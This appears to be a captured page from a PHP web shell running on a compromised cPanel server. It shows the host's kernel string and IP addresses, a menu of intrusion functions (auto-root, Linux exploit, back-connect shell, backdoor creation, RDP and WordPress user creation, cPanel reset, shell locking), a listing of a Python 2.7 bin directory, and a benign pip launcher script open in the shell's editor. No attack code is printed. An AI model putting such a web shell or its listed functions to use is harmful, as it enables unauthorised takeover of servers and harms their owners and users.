Linux s3.cpanelhost.co.in 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
LiteSpeed
: 65.108.44.247 | : 216.73.217.94
Cant Read [ /etc/named.conf ]
7.4.33
teac11783
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
python27 /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
2to3
108
B
-rwxr-xr-x
easy_install
242
B
-rwxr-xr-x
easy_install-2.7
242
B
-rwxr-xr-x
idle
106
B
-rwxr-xr-x
lswsgi
114.24
KB
-rwxr-xr-x
msgfmt.py
6.34
KB
-rwxr-xr-x
pip
660
B
-rwxr-xr-x
pip-2
660
B
-rwxr-xr-x
pip-2.7
660
B
-rwxr-xr-x
pip2
660
B
-rwxr-xr-x
pip2.7
660
B
-rwxr-xr-x
pydoc
91
B
-rwxr-xr-x
pygettext.py
21.57
KB
-rwxr-xr-x
pynche
137
B
-rwxr-xr-x
python
15.27
KB
-rwxr-xr-x
python-config
1.82
KB
-rwxr-xr-x
python-debug
15.27
KB
-rwxr-xr-x
python-debug-config
1.82
KB
-rwxr-xr-x
python2
15.27
KB
-rwxr-xr-x
python2-config
1.82
KB
-rwxr-xr-x
python2-debug
15.27
KB
-rwxr-xr-x
python2-debug-config
1.82
KB
-rwxr-xr-x
python2.7
15.27
KB
-rwxr-xr-x
python2.7-config
1.82
KB
-rwxr-xr-x
python2.7-debug
15.27
KB
-rwxr-xr-x
python2.7-debug-config
1.82
KB
-rwxr-xr-x
smtpd.py
18.12
KB
-rwxr-xr-x
wheel
387
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pip2.7
#!/opt/alt/python27/bin/python # -*- coding: utf-8 -*- import re import sys try: from pip._internal.cli.main import main except ImportError: try: from pip._internal.main import main except ImportError: try: # If the user has downgraded pip, the above import will fail. # Let's try older methods of invoking it: # pip 19 uses this from pip._internal import main except ImportError: # older pip versions use this from pip import main if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0]) sys.exit(main())
Close